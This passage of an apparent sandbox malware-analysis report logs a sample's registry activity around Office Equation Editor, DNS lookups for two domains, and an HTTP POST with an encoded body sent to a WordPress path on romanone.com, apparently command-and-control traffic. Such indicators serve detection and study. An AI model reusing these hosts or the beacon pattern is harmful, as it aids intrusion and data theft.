  1400. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Mincho",
  1401. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Outlook",
  1402. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS PGothic",
  1403. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS PMincho",
  1404. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Reference Sans Serif",
  1405. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Reference Specialty",
  1406. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS UI Gothic",
  1407. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MT Extra",
  1408. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MV Boli",
  1409. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Narkisim",
  1410. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Niagara Engraved",
  1411. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Niagara Solid",
  1412. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Nirmala UI",
  1413. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\NSimSun",
  1414. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Nyala",
  1415. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\OCR A Extended",
  1416. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Old English Text MT",
  1417. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Onyx",
  1418. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Palace Script MT",
  1419. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Palatino Linotype",
  1420. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Papyrus",
  1421. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Parchment",
  1422. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Perpetua",
  1423. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Perpetua Titling MT",
  1424. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Plantagenet Cherokee",
  1425. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Playbill",
  1426. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\PMingLiU",
  1427. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\PMingLiU-ExtB",
  1428. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Poor Richard",
  1429. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Pristina",
  1430. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Raavi",
  1431. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rage Italic",
  1432. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Ravie",
  1433. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell",
  1434. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell Condensed",
  1435. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell Extra Bold",
  1436. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rod",
  1437. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Sakkal Majalla",
  1438. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Script MT Bold",
  1439. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe Print",
  1440. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe Script",
  1441. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI",
  1442. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Light",
  1443. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Semibold",
  1444. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Semilight",
  1445. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Symbol",
  1446. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Shonar Bangla",
  1447. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Showcard Gothic",
  1448. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Shruti",
  1449. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimHei",
  1450. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Simplified Arabic",
  1451. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Simplified Arabic Fixed",
  1452. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimSun",
  1453. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimSun-ExtB",
  1454. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Snap ITC",
  1455. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Stencil",
  1456. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Sylfaen",
  1457. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Symbol",
  1458. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tahoma",
  1459. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tempus Sans ITC",
  1460. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Times New Roman",
  1461. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Traditional Arabic",
  1462. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Trebuchet MS",
  1463. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tunga",
  1464. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT",
  1465. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT Condensed",
  1466. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT Condensed Extra Bold",
  1467. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Utsaah",
  1468. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vani",
  1469. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Verdana",
  1470. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vijaya",
  1471. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Viner Hand ITC",
  1472. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vivaldi",
  1473. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vladimir Script",
  1474. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vrinda",
  1475. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Webdings",
  1476. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wide Latin",
  1477. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings",
  1478. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings 2",
  1479. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings 3",
  1480. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
  1481. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
  1482. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
  1483. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
  1484. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  1485. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr"
  1486.  
  1487.  
  1488. * Deleted Registry Keys:
  1489. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\9q*",
  1490. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\q5(",
  1491. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  1492. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  1493. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  1494. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  1495. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
  1496. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
  1497.  
  1498.  
  1499. * DNS Communications:
  1500.  
  1501. "type": "A",
  1502. "request": "hirecarvietnam.com",
  1503. "answers":
  1504.  
  1505. "data": "163.44.207.86",
  1506. "type": "A"
  1507.  
  1508.  
  1509.  
  1510.  
  1511. "type": "A",
  1512. "request": "romanone.com",
  1513. "answers":
  1514.  
  1515. "data": "195.201.152.3",
  1516. "type": "A"
  1517.  
  1518.  
  1519.  
  1520.  
  1521.  
  1522. * Domains:
  1523.  
  1524. "ip": "163.44.207.86",
  1525. "domain": "hirecarvietnam.com"
  1526.  
  1527.  
  1528. "ip": "195.201.152.3",
  1529. "domain": "romanone.com"
  1530.  
  1531.  
  1532.  
  1533. * Network Communication - ICMP:
  1534.  
  1535. * Network Communication - HTTP:
  1536.  
  1537. "count": 1,
  1538. "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
  1539. "uri": "http://romanone.com:443/wp-content/okoye/32/index.php",
  1540. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  1541. "method": "POST",
  1542. "host": "romanone.com",
  1543. "version": "1.0",
  1544. "path": "/wp-content/okoye/32/index.php",
  1545. "data": "POST /wp-content/okoye/32/index.php HTTP/1.0\r\nHost: romanone.com\r\nConnection: close\r\nUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nContent-Length: 105\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
  1546. "port": 443
  1547.  
  1548.  
  1549.  
  1550. * Network Communication - SMTP:
  1551.  
  1552. * Network Communication - Hosts:
  1553.  
  1554. "country_name": "Germany",
  1555. "ip": "195.201.152.3",
  1556. "inaddrarpa": "",
  1557. "hostname": "romanone.com"
  1558.  
  1559.  
  1560. "country_name": "Vietnam",
  1561. "ip": "163.44.207.86",
  1562. "inaddrarpa": "",
  1563. "hostname": "hirecarvietnam.com"
  1564.  
  1565.  
  1566.  
  1567. * Network Communication - IRC: